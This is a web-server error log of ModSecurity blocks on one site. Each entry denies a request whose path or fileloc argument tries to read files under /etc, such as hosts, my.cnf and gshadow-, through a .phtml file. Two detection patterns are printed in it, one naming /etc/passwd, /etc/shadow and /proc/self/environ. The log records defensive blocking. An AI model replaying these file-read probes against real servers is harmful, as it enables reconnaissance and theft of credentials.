[Fri Mar 20 06:16:15.399348 2026] [:error] [pid 7893:tid 140411590858496] [client 57.141.18.11:56992] [client 57.141.18.11] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QXxCii7xarUs8iHZT0AAAAhI"]
[Fri Mar 20 06:16:15.729299 2026] [:error] [pid 11167:tid 140411716749056] [client 57.141.18.93:56976] [client 57.141.18.93] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QX_HIg5MgXLBnicPldAAAAcM"]
[Fri Mar 20 06:16:16.179517 2026] [:error] [pid 15826:tid 140411548894976] [client 57.141.18.85:57010] [client 57.141.18.85] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc0.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QYOoXxyEfFpUF8f9tWAAAAVc"]
[Fri Mar 20 06:16:16.629149 2026] [:error] [pid 11167:tid 140411725141760] [client 57.141.18.71:57020] [client 57.141.18.71] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/euca2ools"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QYPHIg5MgXLBnicPldgAAAcI"]
[Fri Mar 20 06:16:16.763593 2026] [:error] [pid 10189:tid 140411632822016] [client 57.141.18.91:57024] [client 57.141.18.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/inputrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QYDJ3M9BSuKP7CAYDRwAAAI0"]
[Fri Mar 20 06:16:17.200783 2026] [:error] [pid 10189:tid 140411624429312] [client 57.141.18.111:57034] [client 57.141.18.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QYTJ3M9BSuKP7CAYDSQAAAI4"]
[Fri Mar 20 06:16:17.558403 2026] [:error] [pid 11642:tid 140411741927168] [client 57.141.18.21:57046] [client 57.141.18.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QYbninkcc-iUj5ApKDQAAA4A"]
[Fri Mar 20 06:16:17.612116 2026] [:error] [pid 7893:tid 140411582465792] [client 57.141.18.23:57048] [client 57.141.18.23] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dracut.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QYRCii7xarUs8iHZT0QAAAhM"]
[Fri Mar 20 06:16:18.275466 2026] [:error] [pid 26799:tid 140411624429312] [client 57.141.18.6:57064] [client 57.141.18.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hosts"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QYta6ubjKNq_cu4a-HwAAA04"]
[Fri Mar 20 06:16:18.795198 2026] [:error] [pid 11167:tid 140411590858496] [client 57.141.18.32:57080] [client 57.141.18.32] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc2.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QYvHIg5MgXLBnicPlegAAAdI"]
[Fri Mar 20 06:16:19.019682 2026] [:error] [pid 7893:tid 140411741927168] [client 57.141.18.53:57088] [client 57.141.18.53] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/cron.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QYxCii7xarUs8iHZT0gAAAgA"]
[Fri Mar 20 06:16:19.212903 2026] [:error] [pid 10189:tid 140411607643904] [client 57.141.18.86:57100] [client 57.141.18.86] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases.db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QYzJ3M9BSuKP7CAYDSwAAAJA"]
[Fri Mar 20 06:16:19.735854 2026] [:error] [pid 11642:tid 140411574073088] [client 57.141.18.99:57110] [client 57.141.18.99] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QY7ninkcc-iUj5ApKEAAAA5Q"]
[Fri Mar 20 06:16:20.156937 2026] [:error] [pid 10189:tid 140411733534464] [client 57.141.18.104:57122] [client 57.141.18.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QZDJ3M9BSuKP7CAYDTAAAAIE"]
[Fri Mar 20 06:16:20.312913 2026] [:error] [pid 9818:tid 140411599251200] [client 57.141.18.14:57126] [client 57.141.18.14] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QZF1pVZ5mVmJwsFMbtgAAAFE"]
[Fri Mar 20 06:16:20.519987 2026] [:error] [pid 7235:tid 140411599251200] [client 57.141.18.0:57134] [client 57.141.18.0] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QZPqxLDW4GITHUkTRNAAAARE"]
[Fri Mar 20 06:16:21.023716 2026] [:error] [pid 10189:tid 140411548894976] [client 57.141.18.91:57148] [client 57.141.18.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QZTJ3M9BSuKP7CAYDTQAAAJc"]
[Fri Mar 20 06:16:21.278451 2026] [:error] [pid 7893:tid 140411540502272] [client 57.141.18.95:57156] [client 57.141.18.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QZRCii7xarUs8iHZT1AAAAhg"]
[Fri Mar 20 06:16:21.722455 2026] [:error] [pid 7235:tid 140411658000128] [client 57.141.18.0:57166] [client 57.141.18.0] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/gshadow-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QZfqxLDW4GITHUkTRNQAAAQo"]
[Fri Mar 20 06:16:22.066320 2026] [:error] [pid 7893:tid 140411574073088] [client 57.141.18.31:57172] [client 57.141.18.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QZhCii7xarUs8iHZT1QAAAhQ"]
[Fri Mar 20 06:16:22.176383 2026] [:error] [pid 9818:tid 140411548894976] [client 57.141.18.106:57174] [client 57.141.18.106] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QZl1pVZ5mVmJwsFMbtwAAAFc"]
[Fri Mar 20 06:16:22.950006 2026] [:error] [pid 10189:tid 140411641214720] [client 57.141.18.26:57192] [client 57.141.18.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QZjJ3M9BSuKP7CAYDTgAAAIw"]
[Fri Mar 20 06:16:23.161096 2026] [:error] [pid 9818:tid 140411590858496] [client 57.141.18.28:57198] [client 57.141.18.28] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QZ11pVZ5mVmJwsFMbuAAAAFI"]
[Fri Mar 20 06:16:23.564051 2026] [:error] [pid 26799:tid 140411666392832] [client 57.141.18.39:57208] [client 57.141.18.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dovecot.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QZ9a6ubjKNq_cu4a-IQAAA0k"]
[Fri Mar 20 06:16:23.898402 2026] [:error] [pid 9818:tid 140411632822016] [client 57.141.18.79:57216] [client 57.141.18.79] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QZ11pVZ5mVmJwsFMbugAAAE0"]
[Fri Mar 20 06:16:24.280733 2026] [:error] [pid 26799:tid 140411741927168] [client 57.141.18.48:57222] [client 57.141.18.48] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vimrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QaNa6ubjKNq_cu4a-IwAAA0A"]
[Fri Mar 20 06:16:24.771793 2026] [:error] [pid 21219:tid 140411674785536] [client 57.141.18.87:57230] [client 57.141.18.87] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mime.types"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QaPXLqtnMIWvjpaKF9gAAAog"]
[Fri Mar 20 06:16:25.285524 2026] [:error] [pid 10189:tid 140411540502272] [client 57.141.18.117:57242] [client 57.141.18.117] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sestatus.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QaTJ3M9BSuKP7CAYDTwAAAJg"]
[Fri Mar 20 06:16:25.401138 2026] [:error] [pid 9818:tid 140411725141760] [client 57.141.18.91:57248] [client 57.141.18.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/makedumpfile.conf.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/tridiapason/suspiciency014039650845.phtml"] [unique_id "ab0QaV1pVZ5mVmJwsFMbvQAAAEI"]
